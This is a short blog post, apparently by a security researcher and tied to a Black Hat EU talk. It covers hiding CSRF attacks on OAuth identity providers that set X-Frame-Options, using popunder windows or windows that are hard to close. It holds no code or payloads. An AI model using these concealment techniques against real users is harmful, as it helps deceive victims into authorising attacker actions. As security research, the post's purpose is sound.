It would be better if when we popped up the window, we hid it. In the OAuth examples I just popped up a window. This is probably the last one (yeah, finally – I’m sick of talking about CSRF too) then I’ll hopefully post the whole talk finally :) Hiding the CSRF with a popunder The 2013BH tag links to all posts related to my recent Blackhat EU talk I gave in March. There are probably a lot of techniques here, but there are two options I explored, using a popunder, and just making the window jump around/hard to close. How do we CSRF things that have X-Frame-Options enabled so we can’t use frames? We can always open a window, but a big popup isn’t really ideal. With some of the OAuth attacks from the last few posts, the identity providers did all in fact enable x-frame-options.
With OAuth, protecting against UI redressing is even in the spec, so just creating a frame to do all your sneaky stuff won’t really work. X-Frame-Options is becoming more and more common.